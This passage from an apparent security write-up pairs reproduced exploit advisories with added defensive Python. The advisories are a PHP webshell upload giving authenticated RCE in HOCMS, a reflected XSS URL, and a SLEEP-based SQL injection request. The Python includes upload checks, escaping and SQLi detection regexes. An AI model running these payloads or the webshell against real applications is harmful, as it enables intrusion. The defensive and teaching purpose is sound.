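    """Hardened: the value travels as a bound parameter and can never change the statement."""
    sql = "SELECT * FROM collection_list WHERE member_id = ? ORDER BY date(date_collected) DESC"
    return conn.execute(sql, (member_id,)).fetchall()


def parse_id(raw):
    """Type-enforce at the boundary: accept only an unsigned integer string."""
    if not isinstance(raw, str) or not raw.isdigit():
        raise ValueError("id must be an unsigned integer")
    return int(raw)


def parse_id_list(raw_list):
    """Same rule applied element-wise to array parameters such as sccp_id[]."""
    return [parse_id(x) for x in raw_list]


def is_valid_id(raw):
    try:
        parse_id(raw)
        return True
    except ValueError:
        return False
```

Parameterisation alone closes the injection; the integer check on top of it turns a malformed value into a 400 response instead of an empty result set, which is the behaviour a monitoring team can alert on.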
# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 9/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux

# Request sent as base user

POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215
Content-Length: 769
Origin: http://localhost
Connection: close
Referer: http://localhost/hocms/admin/?page=system_info
Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju

-----------------------------31935477191495174627236953215
Content-Disposition: form-data; name="name"

Home Owners Collection Management System'
-----------------------------31935477191495174627236953215
Content-Disposition: form-data; name="short_name"

HOCMS - PHP
-----------------------------31935477191495174627236953215
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------31935477191495174627236953215
Content-Disposition: form-data; name="cover"; filename="cmd.php"
Content-Type: application/x-php

<?php
if($_REQUEST['s']) {
    system($_REQUEST['s']);
} else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------31935477191495174627236953215--

# Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2022 09:32:16 GMT
Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/8.1.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

# ------------------------------------------------------------------------------------------
# Request to webshell
# ------------------------------------------------------------------------------------------

GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju
Upgrade-Insecure-Requests: 1

# ------------------------------------------------------------------------------------------
# Webshell response
# ------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2022 09:39:06 GMT
Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/8.1.2
Access-Control-Allow-Origin: *
Content-Length: 33
Connection: close
Content-Type: text/html; charset=UTF-8

0xSaudi
</pre>
</body>
</html>
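The exchange above shows the "cover" image field accepting a file named `cmd.php` with a `Content-Type` of `application/x-php`, and the follow-up request shows it stored under `/hocms/uploads/` with a timestamp prefix but the `.php` extension intact, from where the web server executes it. The following is an added example (not the application's upload handler) of the checks such an endpoint should perform before anything is written to disk: an extension allowlist that refuses script extensions in any dotted segment, a magic-byte check that the bytes match the declared type, a scan for script tags inside otherwise valid image data, and a server-generated storage name. The accepted types and the sample payloads are constructed for the example.

```python
import os
import secrets

# Magic bytes for the image types this endpoint should accept (assumption: cover images only).
ALLOWED_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Extensions that must never appear in any dotted segment of the name, so that
# "cover.php" and "cover.php.png" are both refused regardless of handler configuration.
SCRIPT_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "php7", "phar", "phps",
                     "pl", "py", "cgi", "asp", "aspx", "jsp", "htaccess"}


class RejectedUpload(ValueError):
    """Raised with a short reason when an upload must not be stored."""


def validate_image_upload(filename, content):
    """Return the normalised extension to store under, or raise RejectedUpload.

    The client-supplied Content-Type header is deliberately ignored: the bytes
    themselves decide, and the declared extension must agree with them.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise RejectedUpload("no extension")
    if any(p in SCRIPT_EXTENSIONS for p in parts[1:]):
        raise RejectedUpload("script extension present")
    ext = "jpg" if parts[-1] == "jpeg" else parts[-1]
    if ext not in ALLOWED_SIGNATURES:
        raise RejectedUpload("extension not allowed")
    if not content.startswith(ALLOWED_SIGNATURES[ext]):
        raise RejectedUpload("content does not match declared type")
    lowered = content.lower()
    if b"<?php" in lowered or b"<?=" in content or b"<script" in lowered:
        raise RejectedUpload("embedded script tag")
    return ext


def stored_name(ext):
    """Never keep the client's name: a random name under a directory the web server does not execute."""
    return secrets.token_hex(16) + "." + ext


def classify_upload(filename, content):
    """Convenience wrapper for logging and tests: 'ok' or the rejection reason."""
    try:
        validate_image_upload(filename, content)
        return "ok"
    except RejectedUpload as exc:
        return str(exc)
```

The last line of defence is configuration rather than code: the uploads directory should be served with script execution disabled, so that even a file that slips through validation is returned as bytes instead of run.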
# Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
# Date: 2022-02-07
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/contact-forms-builder/
# Version: 1.6.1
# Tested on: Windows 11
# CVE: N/A

1. Description:
This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://localhost/code_generator.php?form_id=<script>alert('xss')</script>
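The four XSS entries on this page (Jetpack `post_id`, Security Audit 'Data Id', CP Blocks 'License ID', Contact Form Builder `form_id`) share one fix: the value must be encoded for the exact context it is written into, and where it is an identifier it should be validated as one before rendering at all. The following is an added example (not code from any of those plugins) that renders an untrusted id into an attribute, into element text and into an inline script literal, and shows why the `">` prefix in the payloads above matters: it is what breaks out of a double-quoted attribute when quotes are not escaped. Function names and the template fragment are constructed for the example.

```python
import html
import json
import re


def escape_for_html_body(value):
    """Text between tags: the five significant characters become entities."""
    return html.escape(value, quote=True)


def render_attribute(name, value):
    """name="value" with the value escaped for a double-quoted attribute.

    quote=True is the important part: without it the '"' in '">' is emitted raw
    and terminates the attribute, which is exactly what the PoC payloads rely on.
    """
    return f'{name}="{html.escape(value, quote=True)}"'


def render_form_view(post_id):
    """Template fragment reflecting the untrusted post_id into two HTML contexts safely."""
    return ('<input type="hidden" ' + render_attribute("name", "post_id") + " "
            + render_attribute("value", post_id) + ">"
            + "<p>Viewing form " + escape_for_html_body(post_id) + "</p>")


def render_js_literal(value):
    """Data passed into an inline <script>: JSON-encode, then escape the angle brackets
    so a value containing '</script>' cannot close the script element."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def validate_post_id(raw):
    """Better still: an id is numeric, so refuse anything else before rendering."""
    return re.fullmatch(r"[0-9]{1,10}", raw) is not None


def contains_live_markup(rendered):
    """Check used by the tests: after escaping, no raw <script or <img tag may survive."""
    return re.search(r"<(script|img)\b", rendered, re.IGNORECASE) is not None
```

Escaping on output is what makes the stored variants safe too: the payload may sit in the database unchanged, but if every render path encodes for its context it never becomes markup.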
# Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html
# Version : 1.0
# Tested on: windows 10 xammp | Kali linux
# Category: WebApp
# Google Dork: N/A
# Date: 09.02.2022

######## Description ########
#
# Authenticate, then open the "update user settings" page; the id parameter
# shown there is injectable, so a payload placed in it will be executed.
#

######## Proof of Concept ########

========>>> REQUEST <<<=========

GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa
Upgrade-Insecure-Requests: 1
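The injection payloads in the AJMS request above, in the hocms `id` entry, and in the AtomCMS and HMS POST bodies are all sqlmap-style probes with a small set of recognisable shapes: a `SLEEP(...)` call for time-based inference, `UNION ALL SELECT`, a quoted tautology such as `' or '6681'='6681`, and a `-- ` terminator. The following is an added example (not part of any of those advisories) of detection logic that URL-decodes each parameter and runs those shapes over constructed access-log lines modelled on the URLs above; it also accepts a POST body, because access logs do not carry one and the AtomCMS and HMS payloads only ever appear there. The log lines, IP addresses and the body string are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicator shapes taken from the payloads on this page; decoded values are matched, not raw URLs.
PATTERNS = [
    ("time-based", re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(", re.I)),
    ("union", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("tautology", re.compile(r"'\s*(?:and|or)\s*'[^']*'\s*=\s*'", re.I)),
    ("comment-terminator", re.compile(r"(?:--\s|/\*)")),
]

# Apache/nginx combined log format, enough fields for this purpose.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def scan_text(text):
    """Return the names of every pattern that fires on an already-decoded value."""
    return [name for name, rx in PATTERNS if rx.search(text)]


def scan_request(url, body=""):
    """Decode each query-string and body parameter; return {param: [pattern names]}."""
    findings = {}
    for source in (urlsplit(url).query, body):
        for key, value in parse_qsl(source, keep_blank_values=True):
            hits = scan_text(value)
            if hits:
                findings[key] = hits
    return findings


def scan_log(lines):
    """Return (ip, url, findings) for each parseable access-log line that carries an indicator."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = scan_request(m.group("url"))
        if findings:
            out.append((m.group("ip"), m.group("url"), findings))
    return out


# Constructed sample log lines (not real captures); URLs follow the entries on this page.
SAMPLE_LOG = [
    '198.51.100.23 - - [10/Feb/2022:10:00:01 +0000] "GET /ajms/admin/?page=user/manage_user&id=5 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [10/Feb/2022:10:00:09 +0000] "GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Feb/2022:10:02:30 +0000] "GET /hocms/admin/?id=0%27%20AND%20(SELECT%209980%20FROM%20(SELECT(SLEEP(5)))POvo)--%20OyKE&page=members/view_member HTTP/1.1" 200 2048',
    'garbage line that is not in combined log format',
]

# Constructed form body in the shape of the AtomCMS UNION payload (shortened CONCAT arguments).
ATOM_BODY = ("email=test%40test.com%27+UNION+ALL+SELECT+NULL%2CCONCAT%280x71%2C0x72%29%2CNULL--+-"
             "&password=1234")

if __name__ == "__main__":
    for ip, url, findings in scan_log(SAMPLE_LOG):
        print(ip, findings, url)
    print(scan_request("/Atom.CMS/admin/login.php", body=ATOM_BODY))
```

The tautology and comment rules are noisy on free-text fields, so in production they are best gated on parameters that should be numeric (`id`, `sccp_id[]`), while the time-based rule pairs well with a response-time field in the log: a request matching `SLEEP(5)` that also took five seconds is no longer a probe but a confirmed injection.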